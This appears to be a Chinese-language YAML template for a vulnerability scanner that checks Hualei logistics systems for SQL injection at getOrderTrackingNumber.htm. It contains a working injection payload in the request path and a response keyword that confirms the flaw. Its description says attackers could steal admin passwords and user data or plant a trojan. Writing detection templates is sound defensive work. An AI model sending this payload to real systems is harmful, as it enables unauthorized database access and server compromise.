keyword: hualei
name: 华磊物流SQL注入漏洞
description: |
  华磊科技物流系统 getOrderTrackingNumber.htm等接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
requests: # 为空代表默认或者不启用
  path: "/getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer--"
  method: GET
  headers:
    User-agent: 
    Content-length: 
    Accept: 
    Content-type: 
    Accept-Encoding: 
    Cookie: 
    Referer: 
    X-Forwarded-For: 
  body-raw: |-
    

response: 
  path: "" # 不填则默认接收此请求的响应包
  status-code: 200
  body: "postgresql"  # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
  time:     # 此处填写响应包响应时间，默认不启用
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: |
  造成SQL数据库中数据泄露。